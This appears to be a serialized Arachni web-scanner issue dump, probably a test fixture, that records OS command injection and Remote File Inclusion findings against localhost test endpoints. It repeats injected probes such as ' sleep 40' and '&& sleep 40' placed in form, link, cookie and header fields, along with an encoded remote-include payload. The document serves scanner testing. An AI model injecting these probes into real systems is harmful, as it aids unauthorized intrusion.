remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/bsd/link/straight?input=default elem: link method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/bsd/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:10769/bsd/link/straight?input=default injected: ! 
' sleep 40' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie url: http://localhost:10769/bsd/cookie/straight elem: cookie method: GET name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep 40' :injected: ! ' sleep 40' :combo: !binary "Y29va2ll": ! ' sleep 40' :action: http://localhost:10769/bsd/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:10769/bsd/cookie/straight injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=+sleep+40 response: {} name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:10769/bsd/header/straight elem: header method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! '&& sleep __TIME__' :skip_orig: true :injected_orig: ! '&& sleep 40' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! '&& sleep 40' :injected: ! '&& sleep 40' :combo: User-Agent: ! '&& sleep 40' :action: http://localhost:10769/bsd/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:10769/bsd/header/straight injected: ! '&& sleep 40' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! '&& sleep 40' Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/solaris/form/straight elem: form method: POST name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/solaris/form/straight :silent: true :regexp: '' var: input url: http://localhost:10769/solaris/form/straight injected: ! 
' sleep 40' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/solaris/link/straight?input=default elem: link method: GET name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/solaris/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:10769/solaris/link/straight?input=default injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie url: http://localhost:10769/solaris/cookie/straight elem: cookie method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep 40' :injected: ! ' sleep 40' :combo: !binary "Y29va2ll": ! ' sleep 40' :action: http://localhost:10769/solaris/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:10769/solaris/cookie/straight injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=+sleep+40 response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:10769/solaris/header/straight elem: header method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! '&& sleep __TIME__' :skip_orig: true :injected_orig: ! '&& sleep 40' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! '&& sleep 40' :injected: ! '&& sleep 40' :combo: User-Agent: ! '&& sleep 40' :action: http://localhost:10769/solaris/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:10769/solaris/header/straight injected: ! 
'&& sleep 40' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! '&& sleep 40' Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/windows/form/straight elem: form method: POST name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/windows/form/straight :silent: true :regexp: '' var: input url: http://localhost:10769/windows/form/straight injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: input url: http://localhost:10769/windows/link/straight?input=default elem: link method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ! ' sleep 40' :follow_location: true :injected: ! ' sleep 40' :combo: !binary "aW5wdXQ=": ! ' sleep 40' :action: http://localhost:10769/windows/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:10769/windows/link/straight?input=default injected: ! ' sleep 40' id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." 
remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: cookie url: http://localhost:10769/windows/cookie/straight elem: cookie method: GET name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! ' sleep __TIME__' :skip_orig: true :injected_orig: ! ' sleep 40' :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": ! ' sleep 40' :injected: ! ' sleep 40' :combo: !binary "Y29va2ll": ! ' sleep 40' :action: http://localhost:10769/windows/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:10769/windows/cookie/straight injected: ! 
' sleep 40' id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=+sleep+40 response: {} name: Operating system command injection (timing attack) description: ! "The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection var: User-Agent url: http://localhost:10769/windows/header/straight elem: header method: GET name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/OS_Command_Injection opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 :timeout: 28000.0 :timeout_divider: 1000 :timing_string: ! '&& sleep __TIME__' :skip_orig: true :injected_orig: ! '&& sleep 40' :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ! '&& sleep 40' :injected: ! '&& sleep 40' :combo: User-Agent: ! '&& sleep 40' :action: http://localhost:10769/windows/header/straight :silent: true :regexp: '' var: User-Agent url: http://localhost:10769/windows/header/straight injected: ! '&& sleep 40' id: regexp: '' regexp_match: elem: header remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ! '&& sleep 40' Cookie: cookie=cookie+value response: {} name: Operating system command injection (timing attack) description: ! 
"The web application allows an attacker to\n execute arbitrary OS commands even though it does not return\n the command output in the HTML body.\n (This issue was discovered using a timing attack; timing attacks\n \ can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n \ even if they are false positives.)" tags: - os - command - code - injection - timing - blind cwe: '78' cwe_url: http://cwe.mitre.org/data/definitions/78.html severity: High cvssv2: '9.0' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as OS level commands." remedy_code: '' metasploitable: unix/webapp/arachni_exec mod_name: OS command injection (timing) variations: [] internal_modname: OSCmdInjectionTiming internal_modname: OSCmdInjectionTiming - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: input url: http://localhost:5571/form/straight elem: form method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion opts: :redundant: false :async: true :regexp: 705cd559b16e6946826207c2199bd890 :match: 705cd559b16e6946826207c2199bd890 :substring: 705cd559b16e6946826207c2199bd890 :ignore: :elements: - link - form - cookie - header - body :train: :follow_location: false :injected_orig: arachni.github.com/arachni/rfi.md5.txt :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA :injected: !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA :combo: !binary "aW5wdXQ=": !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA :action: http://localhost:5571/form/straight :verification: false :id: 705cd559b16e6946826207c2199bd890 var: input url: http://localhost:5571/form/straight injected: !binary |- YXJhY2huaS5naXRodWIuY29tL2FyYWNobmkvcmZpLm1kNS50eHQA id: 705cd559b16e6946826207c2199bd890 regexp: 705cd559b16e6946826207c2199bd890 regexp_match: 705cd559b16e6946826207c2199bd890 elem: form remarks: {} method: GET response: ! 
'705cd559b16e6946826207c2199bd890 ' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNjowNiBHTVQ= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzM= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_php_include mod_name: Remote File Inclusion variations: [] internal_modname: RFI internal_modname: RFI - !ruby/object:Arachni::Issue verification: false references: WASC: http://projects.webappsec.org/Remote-File-Inclusion Wikipedia: http://en.wikipedia.org/wiki/Remote_File_Inclusion var: input url: http://localhost:5571/form/append elem: form method: GET name: Remote File Inclusion description: ! "The web application can be forced to include\n 3rd party remote content which can often lead to arbitrary code\n execution, amongst other attacks." tags: - remote - file - inclusion - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "Enforce strict validation and filtering\n on user inputs." 
